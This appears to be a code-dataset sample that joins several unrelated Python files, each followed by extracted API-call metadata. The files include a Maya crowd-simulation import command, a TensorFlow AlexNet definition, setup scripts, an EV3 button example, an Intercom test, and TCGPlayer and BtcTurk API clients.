options[kCacheGeometryFlag] = False
if argData.isFlagSet( kDeleteSkeletonFlag ):
options[kDeleteSkeletonFlag] = argData.flagArgumentBool( kDeleteSkeletonFlag, 0 )
else:
options[kDeleteSkeletonFlag] = False
if argData.isFlagSet( kCacheDirFlag ):
options[kCacheDirFlag] = argData.flagArgumentString( kCacheDirFlag, 0 )
else:
options[kCacheDirFlag] = ""
if argData.isFlagSet( kRangeFlag ):
options[kRangeFlag] = argData.flagArgumentString( kRangeFlag, 0 )
else:
options[kRangeFlag] = ""
if argData.isFlagSet( kAnimTypeFlag ):
str = argData.flagArgumentString( kAnimTypeFlag, 0 )
if (str == "curves"):
options[kAnimTypeFlag] = MayaSimAgent.eAnimType.curves
elif (str == "loader"):
options[kAnimTypeFlag] = MayaSimAgent.eAnimType.loader
else:
raise ns.py.Errors.BadArgumentError( 'Please choose either "curves" or "loader" as the animType' )
else:
options[kAnimTypeFlag] = MayaSimAgent.eAnimType.curves
if ( options[kMaterialTypeFlag] != "blinn" and
options[kMaterialTypeFlag] != "lambert" ):
raise ns.py.Errors.BadArgumentError( 'Please choose either "blinn" or "lambert" as the materialType' )
if (options[kDeleteSkeletonFlag] and not options[kCacheGeometryFlag]):
raise ns.py.Errors.BadArgumentError( 'The skeleton can only be deleted when caching geometry' )
if ( options[kCacheGeometryFlag] and
MayaSkin.eSkinType.smooth != options[kSkinTypeFlag] ):
options[kCacheGeometryFlag] = False
options[kDeleteSkeletonFlag] = False
self.displayWarning( 'Skin type is "%s", geometry will not be cached. Please set skin type to "smooth" to use geometry caching.' % self._options[MsvOpt.kSkinType] )
return options
def doQuery( self, argData ):
if argData.isFlagSet( kSelectionFlag ):
if argData.isFlagSet( kMasFileFlag ):
masFile = argData.flagArgumentString( kMasFileFlag, 0 )
fileHandle = open(masFile, "r")
try:
mas = MasReader.read( fileHandle )
finally:
fileHandle.close()
self.setResult( mas.selectionGroup.selectionNames() )
else:
raise ns.py.Error.BadArgumentError( "When querying the -selection flag please use the -masFile to indicate which .mas file's selections to query." )
else:
raise ns.py.Error.BadArgumentError( 'Only the -selection flag is queryable.' )
def doIt(self,argList):
argData = OpenMaya.MArgDatabase( self.syntax(), argList )
if argData.isQuery():
self.doQuery( argData )
else:
options = self._parseArgs( argData )
undoQueue = mc.undoInfo( query=True, state=True )
try:
try:
mc.undoInfo( state=False )
scene = Scene.Scene()
scene.setMas(options[kMasFileFlag])
sim = Sim.Sim(scene,
options[kSimDirFlag],
options[kSimTypeFlag],
options[kCallsheetFlag],
options[kSelectionFlag],
options[kRangeFlag])
agentOptions = MayaAgent.Options()
agentOptions.loadGeometry = options[kLoadGeometryFlag]
agentOptions.loadPrimitives = options[kLoadSegmentsFlag]
agentOptions.loadMaterials = options[kLoadMaterialsFlag]
agentOptions.skinType = options[kSkinTypeFlag]
agentOptions.instancePrimitives = options[kInstanceSegmentsFlag]
agentOptions.materialType = options[kMaterialTypeFlag]
mayaSim = MayaSim.MayaSim()
mayaSim.build(sim,
options[kAnimTypeFlag],
options[kFrameStepFlag],
options[kCacheGeometryFlag],
options[kCacheDirFlag],
options[kDeleteSkeletonFlag],
agentOptions)
del mayaSim
del sim
del scene
gc.collect()
finally:
mc.undoInfo( state=undoQueue )
except ns.py.Errors.AbortError:
self.displayError("Import cancelled by user")
except:
raise
def creator():
return OpenMayaMPx.asMPxPtr( MsvSimImportCmd() )
def syntaxCreator():
syntax = OpenMaya.MSyntax()
syntax.addFlag( kSimDirFlag, kSimDirFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kSimTypeFlag, kSimTypeFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kMasFileFlag, kMasFileFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kCallsheetFlag, kCallsheetFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kLoadGeometryFlag, kLoadGeometryFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kSkinTypeFlag, kSkinTypeFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kLoadSegmentsFlag, kLoadSegmentsFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kLoadMaterialsFlag, kLoadMaterialsFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kMaterialTypeFlag, kMaterialTypeFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kFrameStepFlag, kFrameStepFlagLong, OpenMaya.MSyntax.kLong )
syntax.addFlag( kInstanceSegmentsFlag, kInstanceSegmentsFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kSelectionFlag, kSelectionFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kCacheGeometryFlag, kCacheGeometryFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kDeleteSkeletonFlag, kDeleteSkeletonFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kCacheDirFlag, kCacheDirFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kRangeFlag, kRangeFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kAnimTypeFlag, kAnimTypeFlagLong, OpenMaya.MSyntax.kString )
syntax.makeFlagMultiUse( kSelectionFlag )
syntax.makeFlagQueryWithFullArgs( kMasFileFlag, False )
syntax.enableQuery( True )
return syntax
| [
"ns.bridge.data.Scene.Scene",
"maya.OpenMaya.MSyntax",
"ns.bridge.io.MasReader.read",
"maya.cmds.undoInfo",
"maya.OpenMayaMPx.MPxCommand.__init__",
"maya.OpenMaya.MArgList",
"ns.maya.msv.MayaAgent.Options",
"ns.maya.msv.MayaSim.MayaSim",
"ns.bridge.data.Sim.Sim",
"gc.collect"
] | [((9528, 9546), 'maya.OpenMaya.MSyntax', 'OpenMaya.MSyntax', ([], {}), '()\n', (9544, 9546), True, 'import maya.OpenMaya as OpenMaya\n'), ((2676, 2713), 'maya.OpenMayaMPx.MPxCommand.__init__', 'OpenMayaMPx.MPxCommand.__init__', (['self'], {}), '(self)\n', (2707, 2713), True, 'import maya.OpenMayaMPx as OpenMayaMPx\n'), ((8161, 8196), 'maya.cmds.undoInfo', 'mc.undoInfo', ([], {'query': '(True)', 'state': '(True)'}), '(query=True, state=True)\n', (8172, 8196), True, 'import maya.cmds as mc\n'), ((5250, 5269), 'maya.OpenMaya.MArgList', 'OpenMaya.MArgList', ([], {}), '()\n', (5267, 5269), True, 'import maya.OpenMaya as OpenMaya\n'), ((7579, 7605), 'ns.bridge.io.MasReader.read', 'MasReader.read', (['fileHandle'], {}), '(fileHandle)\n', (7593, 7605), True, 'import ns.bridge.io.MasReader as MasReader\n'), ((8223, 8247), 'maya.cmds.undoInfo', 'mc.undoInfo', ([], {'state': '(False)'}), '(state=False)\n', (8234, 8247), True, 'import maya.cmds as mc\n'), ((8269, 8282), 'ns.bridge.data.Scene.Scene', 'Scene.Scene', ([], {}), '()\n', (8280, 8282), True, 'import ns.bridge.data.Scene as Scene\n'), ((8341, 8476), 'ns.bridge.data.Sim.Sim', 'Sim.Sim', (['scene', 'options[kSimDirFlag]', 'options[kSimTypeFlag]', 'options[kCallsheetFlag]', 'options[kSelectionFlag]', 'options[kRangeFlag]'], {}), '(scene, options[kSimDirFlag], options[kSimTypeFlag], options[\n kCallsheetFlag], options[kSelectionFlag], options[kRangeFlag])\n', (8348, 8476), True, 'import ns.bridge.data.Sim as Sim\n'), ((8547, 8566), 'ns.maya.msv.MayaAgent.Options', 'MayaAgent.Options', ([], {}), '()\n', (8564, 8566), True, 'import ns.maya.msv.MayaAgent as MayaAgent\n'), ((8955, 8972), 'ns.maya.msv.MayaSim.MayaSim', 'MayaSim.MayaSim', ([], {}), '()\n', (8970, 8972), True, 'import ns.maya.msv.MayaSim as MayaSim\n'), ((9259, 9271), 'gc.collect', 'gc.collect', ([], {}), '()\n', (9269, 9271), False, 'import gc\n'), ((9290, 9318), 'maya.cmds.undoInfo', 'mc.undoInfo', ([], {'state': 'undoQueue'}), '(state=undoQueue)\n', 
(9301, 9318), True, 'import maya.cmds as mc\n')] |
import tensorflow as tf
def maxPoolLayer(x, ksize, stride, padding='VALID', name=None):
return tf.nn.max_pool(x,
ksize=[1, ksize, ksize, 1],
strides=[1, stride, stride, 1],
padding=padding,
name=name)
def LRN(x, R=2, alpha=2e-5, beta=0.75, bias=1.0, name=None):
return tf.nn.local_response_normalization(x,
depth_radius=R,
alpha=alpha,
beta=beta,
bias=bias,
name=name)
def fcLayer(x, outputD, name, std_init=0.005, bias_init=0.0, reluFlag=True):
inputD = int(x.get_shape()[-1])
with tf.variable_scope(name, reuse=tf.AUTO_REUSE) as scope:
w = tf.get_variable("w",
shape=[inputD, outputD],
dtype="float",
initializer=tf.random_normal_initializer(
stddev=std_init),
regularizer=tf.contrib.layers.l2_regularizer(5e-4))
b = tf.get_variable("b",
[outputD],
dtype="float",
initializer=tf.constant_initializer(bias_init))
out = tf.nn.xw_plus_b(x, w, b, name=scope.name)
if reluFlag:
return tf.nn.relu(out)
else:
return out
def convLayer(x, ksize, stride, feature, padding='SAME', bias_init=0.0, groups=1, name=None):
channel = int(x.get_shape()[-1])
def conv(a, b): return tf.nn.conv2d(a,
b,
strides=[1, stride, stride, 1],
padding=padding)
with tf.variable_scope(name) as scope:
w = tf.get_variable("w",
shape=[ksize, ksize, channel / groups, feature],
initializer=tf.random_normal_initializer(
stddev=0.01),
regularizer=tf.contrib.layers.l2_regularizer(5e-4))
b = tf.get_variable("b",
shape=[feature],
initializer=tf.constant_initializer(bias_init))
xNew = tf.split(value=x, num_or_size_splits=groups, axis=3)
wNew = tf.split(value=w, num_or_size_splits=groups, axis=3)
featureMap = [conv(t1, t2) for t1, t2 in zip(xNew, wNew)]
mergeFeatureMap = tf.concat(values=featureMap, axis=3)
out = tf.nn.bias_add(mergeFeatureMap, b)
return tf.nn.relu(out, name=scope.name)
def alexnet(input, is_training, root_conv_stride=4):
end_points = {}
with tf.variable_scope('alexnet', reuse=tf.AUTO_REUSE):
conv1 = convLayer(input, 11, root_conv_stride,
96, "VALID", name="conv1")
end_points['conv1'] = conv1
pool1 = maxPoolLayer(conv1, 3, 2, name="pool1")
lrn1 = LRN(pool1, name="lrn1")
conv2 = convLayer(lrn1, 5, 1, 256, groups=2,
bias_init=1.0, name="conv2")
end_points['conv2'] = conv2
pool2 = maxPoolLayer(conv2, 3, 2, name="pool2")
lrn2 = LRN(pool2, name="lrn2")
conv3 = convLayer(lrn2, 3, 1, 384, name="conv3")
end_points['conv3'] = conv3
conv4 = convLayer(conv3, 3, 1, 384, groups=2,
bias_init=1.0, name="conv4")
end_points['conv4'] = conv4
conv5 = convLayer(conv4, 3, 1, 256, groups=2,
bias_init=1.0, name="conv5")
end_points['conv5'] = conv5
conv5 = tf.pad(conv5, paddings=[[0, 0], [1, 0], [1, 0], [0, 0]])
pool5 = maxPoolLayer(conv5, 3, 2, name="pool5")
#fc1 = fcLayer(tf.layers.flatten(pool5), 1024, name="fc6")
fc1 = convLayer(pool5, 3, 1, 1024, "VALID", bias_init=1.0, name="fc6")
end_points['fc6'] = fc1
return fc1, end_points
| [
"tensorflow.nn.local_response_normalization",
"tensorflow.nn.conv2d",
"tensorflow.nn.max_pool",
"tensorflow.variable_scope",
"tensorflow.nn.relu",
"tensorflow.pad",
"tensorflow.contrib.layers.l2_regularizer",
"tensorflow.split",
"tensorflow.nn.xw_plus_b",
"tensorflow.random_normal_initializer",
... | [((101, 211), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['x'], {'ksize': '[1, ksize, ksize, 1]', 'strides': '[1, stride, stride, 1]', 'padding': 'padding', 'name': 'name'}), '(x, ksize=[1, ksize, ksize, 1], strides=[1, stride, stride, 1\n ], padding=padding, name=name)\n', (115, 211), True, 'import tensorflow as tf\n'), ((385, 489), 'tensorflow.nn.local_response_normalization', 'tf.nn.local_response_normalization', (['x'], {'depth_radius': 'R', 'alpha': 'alpha', 'beta': 'beta', 'bias': 'bias', 'name': 'name'}), '(x, depth_radius=R, alpha=alpha, beta=\n beta, bias=bias, name=name)\n', (419, 489), True, 'import tensorflow as tf\n'), ((839, 883), 'tensorflow.variable_scope', 'tf.variable_scope', (['name'], {'reuse': 'tf.AUTO_REUSE'}), '(name, reuse=tf.AUTO_REUSE)\n', (856, 883), True, 'import tensorflow as tf\n'), ((1428, 1469), 'tensorflow.nn.xw_plus_b', 'tf.nn.xw_plus_b', (['x', 'w', 'b'], {'name': 'scope.name'}), '(x, w, b, name=scope.name)\n', (1443, 1469), True, 'import tensorflow as tf\n'), ((1725, 1792), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['a', 'b'], {'strides': '[1, stride, stride, 1]', 'padding': 'padding'}), '(a, b, strides=[1, stride, stride, 1], padding=padding)\n', (1737, 1792), True, 'import tensorflow as tf\n'), ((1923, 1946), 'tensorflow.variable_scope', 'tf.variable_scope', (['name'], {}), '(name)\n', (1940, 1946), True, 'import tensorflow as tf\n'), ((2433, 2485), 'tensorflow.split', 'tf.split', ([], {'value': 'x', 'num_or_size_splits': 'groups', 'axis': '(3)'}), '(value=x, num_or_size_splits=groups, axis=3)\n', (2441, 2485), True, 'import tensorflow as tf\n'), ((2501, 2553), 'tensorflow.split', 'tf.split', ([], {'value': 'w', 'num_or_size_splits': 'groups', 'axis': '(3)'}), '(value=w, num_or_size_splits=groups, axis=3)\n', (2509, 2553), True, 'import tensorflow as tf\n'), ((2647, 2683), 'tensorflow.concat', 'tf.concat', ([], {'values': 'featureMap', 'axis': '(3)'}), '(values=featureMap, axis=3)\n', (2656, 2683), True, 'import 
tensorflow as tf\n'), ((2699, 2733), 'tensorflow.nn.bias_add', 'tf.nn.bias_add', (['mergeFeatureMap', 'b'], {}), '(mergeFeatureMap, b)\n', (2713, 2733), True, 'import tensorflow as tf\n'), ((2749, 2781), 'tensorflow.nn.relu', 'tf.nn.relu', (['out'], {'name': 'scope.name'}), '(out, name=scope.name)\n', (2759, 2781), True, 'import tensorflow as tf\n'), ((2867, 2916), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""alexnet"""'], {'reuse': 'tf.AUTO_REUSE'}), "('alexnet', reuse=tf.AUTO_REUSE)\n", (2884, 2916), True, 'import tensorflow as tf\n'), ((3802, 3858), 'tensorflow.pad', 'tf.pad', (['conv5'], {'paddings': '[[0, 0], [1, 0], [1, 0], [0, 0]]'}), '(conv5, paddings=[[0, 0], [1, 0], [1, 0], [0, 0]])\n', (3808, 3858), True, 'import tensorflow as tf\n'), ((1511, 1526), 'tensorflow.nn.relu', 'tf.nn.relu', (['out'], {}), '(out)\n', (1521, 1526), True, 'import tensorflow as tf\n'), ((1063, 1108), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': 'std_init'}), '(stddev=std_init)\n', (1091, 1108), True, 'import tensorflow as tf\n'), ((1183, 1223), 'tensorflow.contrib.layers.l2_regularizer', 'tf.contrib.layers.l2_regularizer', (['(0.0005)'], {}), '(0.0005)\n', (1215, 1223), True, 'import tensorflow as tf\n'), ((1378, 1412), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['bias_init'], {}), '(bias_init)\n', (1401, 1412), True, 'import tensorflow as tf\n'), ((2107, 2148), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.01)'}), '(stddev=0.01)\n', (2135, 2148), True, 'import tensorflow as tf\n'), ((2223, 2263), 'tensorflow.contrib.layers.l2_regularizer', 'tf.contrib.layers.l2_regularizer', (['(0.0005)'], {}), '(0.0005)\n', (2255, 2263), True, 'import tensorflow as tf\n'), ((2381, 2415), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['bias_init'], {}), '(bias_init)\n', (2404, 2415), True, 'import tensorflow as tf\n')] |
from setuptools import setup, find_packages
setup(name='Multilevel MDA-Lite Paris Traceroute',
version='0.1',
description='Costless version of MDA + Router level view of traceroute',
url='https://gitlab.planet-lab.eu/',
author='<NAME>,',
author_email='<EMAIL>',
license='MIT',
packages=find_packages(),
install_requires=[
'scapy', 'netifaces'
],
zip_safe=False) | [
"setuptools.find_packages"
] | [((329, 344), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (342, 344), False, 'from setuptools import setup, find_packages\n')] |
#!/usr/bin/env pybricks-micropython
# ↑ Interpretador do python definido para o EV3
# Importações dos módulos utilizados
# Módulo principal do brick importado da biblioteca principal
from pybricks import ev3brick as brick
# Módulo dos botões do brick
from pybricks.parameters import Button
# Módulo de esperar, dentro das ferramentas
from pybricks.tools import wait
# Importa a nossa outra função criada no outro programa
from Botoes_1 import pressionado
'''
Ao executar o programa anterior, você perceberá que ao pressionar o botão
muitas linhas foram registradas no console, e isso acontece por conta da
taxa de atualização do programa.
Quando você aperta o botão uma vez, ele percebe isso e escreve no console,
mas não espera você soltar, e é isso que vamos explorar nesse programa
'''
# Criar uma função que verifica se um botão não está pressionado
def solto(botao):
# Se o botão escolhido não estiver dentro da lista de botões pressionados
if botao not in brick.buttons():
# Retorna verdadeiro
return True
# Senão
else:
# Retorna falso
return False
# Criar uma função que espera o botão ser pressionado e depois solto
def esperar_pressionado_solto(botao):
# Enquanto o botão não for pressionado
while not pressionado(botao):
# Faz uma pausa de 10 ms
wait(10)
# Após pressionado, enquanto não for solto
while not solto(botao):
# Faz uma pausa de 10 ms
wait(10)
# Ou seja, verifica de 10 em 10 ms nossas condições
# Vamos testar!
def main():
print('Inicio do teste... Pressione e solte o botão!')
esperar_pressionado_solto(Button.UP)
print('Botão pressionado e solto!')
# Se o programa está executando como principal
if __name__ == '__main__':
# Executa nossa função de teste
main()
# Fonte:
# https://pybricks.github.io/ev3-micropython/hubs.html#pybricks.hubs.EV3Brick.buttons.pressed
| [
"Botoes_1.pressionado",
"pybricks.ev3brick.buttons",
"pybricks.tools.wait"
] | [((976, 991), 'pybricks.ev3brick.buttons', 'brick.buttons', ([], {}), '()\n', (989, 991), True, 'from pybricks import ev3brick as brick\n'), ((1275, 1293), 'Botoes_1.pressionado', 'pressionado', (['botao'], {}), '(botao)\n', (1286, 1293), False, 'from Botoes_1 import pressionado\n'), ((1336, 1344), 'pybricks.tools.wait', 'wait', (['(10)'], {}), '(10)\n', (1340, 1344), False, 'from pybricks.tools import wait\n'), ((1462, 1470), 'pybricks.tools.wait', 'wait', (['(10)'], {}), '(10)\n', (1466, 1470), False, 'from pybricks.tools import wait\n')] |
# -*- coding: utf-8 -*-
import os
import unittest
from intercom.client import Client
intercom = Client(
os.environ.get('INTERCOM_PERSONAL_ACCESS_TOKEN'))
class SegmentTest(unittest.TestCase):
@classmethod
def setup_class(cls):
cls.segment = intercom.segments.all()[0]
def test_find_segment(self):
# Find a segment
segment = intercom.segments.find(id=self.segment.id)
self.assertEqual(segment.id, self.segment.id)
def test_iterate(self):
# Iterate over all segments
for segment in intercom.segments.all():
self.assertTrue(segment.id is not None)
| [
"os.environ.get"
] | [((110, 158), 'os.environ.get', 'os.environ.get', (['"""INTERCOM_PERSONAL_ACCESS_TOKEN"""'], {}), "('INTERCOM_PERSONAL_ACCESS_TOKEN')\n", (124, 158), False, 'import os\n')] |
import os
import json
import logging
from functools import partial
from json import JSONDecodeError
from typing import Any, Dict, List, NamedTuple, Union
import requests
from tcgplayer_api.auth import BearerAuth
from tcgplayer_api.utils import words_to_snake_case
logger = logging.getLogger(__name__)
# TODO: Consider using werkzeug exceptions
class UnexpectedStatusCode(Exception):
pass
class HttpMethodError(Exception):
pass
class Response(NamedTuple):
status_code: int
headers: Dict[str, str]
json: Union[List[Dict[str, Any]], Dict[str, Any]] = None
class RequestsClient:
"""Wrapper around requests to simplify interaction with JSON REST APIs"""
DEFAULT_HEADERS = {
"Accept": "application/json",
"Content-Type": "application/json",
}
def __init__(self, auth: BearerAuth, headers: dict = None):
_headers = dict(self.DEFAULT_HEADERS)
if headers is not None:
_headers.update(headers)
s = requests.Session()
s.auth = auth
self.headers = _headers
self.session = s
def __repr__(self):
return "RequestsClient"
def request(self, method: str, url: str, **kwargs) -> Response:
req_headers = dict(self.headers)
if "headers" in kwargs:
headers_to_add = kwargs.pop("headers")
req_headers.update(headers_to_add)
r = self.session.request(method, url, headers=req_headers, **kwargs)
r.raise_for_status()
try:
resp = Response(status_code=r.status_code, headers=r.headers, json=r.json())
except JSONDecodeError:
resp = Response(status_code=r.status_code, headers=r.headers)
return resp
class TCGPlayerClient:
API_SPEC_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), "api_specs"))
def __init__(self, auth: BearerAuth, headers: dict = None,
api_version: str = None, ):
headers = headers or {}
self.client = RequestsClient(auth=auth, headers=headers)
self.version = api_version or self._get_latest_api_version()
self.base_url = f"http://api.tcgplayer.com/{self.version}"
self.services = {}
api_file = f"{self.API_SPEC_PATH}/{self.version}.json"
with open(api_file, "r") as f:
api_data = json.load(f)
# Add each API object as a class instance method
for service in api_data:
func_name = words_to_snake_case(service["name"])
method = self._method_factory(func_name, service["uri"], service["http_method"])
method.__name__ = method.__qualname__ = func_name
method.__doc__ = service.get("description")
self.__dict__[func_name] = method
def _get_latest_api_version(self):
return max(os.listdir(self.API_SPEC_PATH))[:-5] # strip ending ".json"
def _method_factory(self, service_name: str, uri: str, http_method: str):
"""Factory function to create class instance methods from api_specs."""
def service_name(**parameters):
# Note that parameters combined path parameters and query parameters
# this is for convenience,
# but assumes that path params and query params can't collide.
request_uri = uri.format(**parameters)
request_url = f"{self.base_url}{request_uri}"
# Execute API Call
# Will raise HTTPError: "405 Client Error: Method Not Allowed for url"
# if a bad http_method is given
# TODO: See why posts aren't working ATM; "params" might need to be "data"
# See: https://requests.readthedocs.io/en/master/api/?highlight=.request#requests.Session.request
response = self.client.request(http_method, request_url, params=parameters)
if response.status_code != 200:
raise UnexpectedStatusCode
resp_json = response.json
if not resp_json:
raise ValueError("No data returned.")
# TODO, loop through pages and collect results
# TODO create a class for the response
return resp_json
return service_name
| [
"logging.getLogger",
"os.listdir",
"requests.Session",
"os.path.dirname",
"tcgplayer_api.utils.words_to_snake_case",
"json.load"
] | [((277, 304), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (294, 304), False, 'import logging\n'), ((991, 1009), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1007, 1009), False, 'import requests\n'), ((1796, 1821), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1811, 1821), False, 'import os\n'), ((2332, 2344), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2341, 2344), False, 'import json\n'), ((2460, 2496), 'tcgplayer_api.utils.words_to_snake_case', 'words_to_snake_case', (["service['name']"], {}), "(service['name'])\n", (2479, 2496), False, 'from tcgplayer_api.utils import words_to_snake_case\n'), ((2813, 2843), 'os.listdir', 'os.listdir', (['self.API_SPEC_PATH'], {}), '(self.API_SPEC_PATH)\n', (2823, 2843), False, 'import os\n')] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='xacro4sdf',
version='2.1.0',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/gezp/xacro4sdf',
description='a simple XML macro script for sdf, like ros/xacro which is desiged for urdf.',
long_description=long_description,
long_description_content_type='text/markdown',
license='MIT',
keywords=['sdf','sdformat','xacro', 'gazebo', 'ignition'],
include_package_data=True,
packages=find_packages(),
entry_points={
'console_scripts': [
'xacro4sdf=xacro4sdf:xacro4sdf_main',
]
}
)
| [
"os.path.dirname",
"setuptools.find_packages",
"os.path.join"
] | [((138, 160), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (150, 160), False, 'from os import path\n'), ((172, 210), 'os.path.join', 'path.join', (['this_directory', '"""README.md"""'], {}), "(this_directory, 'README.md')\n", (181, 210), False, 'from os import path\n'), ((735, 750), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (748, 750), False, 'from setuptools import setup, find_packages\n')] |
import time, base64, hmac, hashlib, json, requests
class BtcTurk():
BASE_URL = "https://api.btcturk.com"
GRAPH_BASE_URL = "https://graph-api.btcturk.com"
def __init__(self, api_key=None, api_Secret=None):
self.api_key = api_key
self.api_Secret = api_Secret
def _headers(self,protection):
if protection:
if self.api_key and self.api_Secret:
apiSecret = base64.b64decode(self.api_Secret)
stamp = str(int(time.time())*1000)
data = "{}{}".format(self.api_key, stamp).encode("utf-8")
signature = hmac.new(apiSecret, data, hashlib.sha256).digest()
signature = base64.b64encode(signature)
return {"X-PCK": self.api_key, "X-Stamp": stamp, "X-Signature": signature, "Content-Type" : "application/json"}
else:
return "You must set your public and private key for this method."
return {}
def ticker(self,pair_symbol = None):
if pair_symbol:
method = "/api/v2/ticker?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
else:
method = "/api/v2/ticker"
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
def ticker_currency(self,symbol = None):
if symbol:
method = "/api/v2/ticker/currency?symbol=" + symbol
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
def get_order_book(self,pair_symbol = None):
if pair_symbol:
method = "/api/v2/orderbook?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def get_all_trades(self,pair_symbol = None,last = None):
if pair_symbol:
method = "/api/v2/trades?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def get_last_trades(self,pair_symbol = None,last = None):
if pair_symbol:
method = "/api/v2/trades?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
if last:
uri = self.BASE_URL + method
result = requests.get(url=uri +"&"+ last)
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
else:
return "Choose a pair Symbol for this method."
def get_all_ohcl(self,pair_symbol):
if pair_symbol:
method = "/v1/ohlcs?pair=" + pair_symbol
uri = self.GRAPH_BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def get_balances(self):
method = "/api/v1/users/balances"
uri = self.BASE_URL + method
result = requests.get(url=uri, headers=self._headers(True))
result = result.json()
return json.dumps(result, indent=2)
def get_transactions(self):
method = "/api/v1/users/transactions/trade"
uri = self.BASE_URL + method
result = requests.get(url=uri, headers=self._headers(True))
result = result.json()
return json.dumps(result, indent=2)
def get_open_order(self,pair_symbol):
if pair_symbol:
method = "/api/v1/openOrders?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
result = requests.get(url=uri, headers=self._headers(True))
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def cancel_order(self,order_id):
if order_id:
method = "/api/v1/order?id=" + order_id
uri = self.BASE_URL + method
result = requests.get(url=uri, headers=self._headers(True))
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def market_sell(self, pair_symbol, quantity):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": "0","stopPrice": 0, "newOrderClientId":"BtcTurk API", "orderMethod":"market", "orderType":"sell", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def market_buy(self, pair_symbol, quantity):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": "0","stopPrice": 0, "newOrderClientId":"BtcTurk API", "orderMethod":"market", "orderType":"buy", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def limit_sell(self, pair_symbol, quantity, price):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": price,"stopPrice": 0, "newOrderClientId":"BtcTurk API", "orderMethod":"limit", "orderType":"sell", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def limit_buy(self, pair_symbol, quantity, price):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": price,"stopPrice": 0, "newOrderClientId":"BtcTurk API", "orderMethod":"limit", "orderType":"buy", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def stop_sell(self, pair_symbol, quantity, price, stop_price):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": price,"stopPrice": stop_price, "newOrderClientId":"BtcTurk API", "orderMethod":"stoplimit", "orderType":"sell", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def stop_buy(self, pair_symbol, quantity, price, stop_price):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": price,"stopPrice": stop_price, "newOrderClientId":"BtcTurk API", "orderMethod":"stoplimit", "orderType":"buy", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
| [
"hmac.new",
"base64.b64encode",
"json.dumps",
"base64.b64decode",
"requests.get",
"time.time"
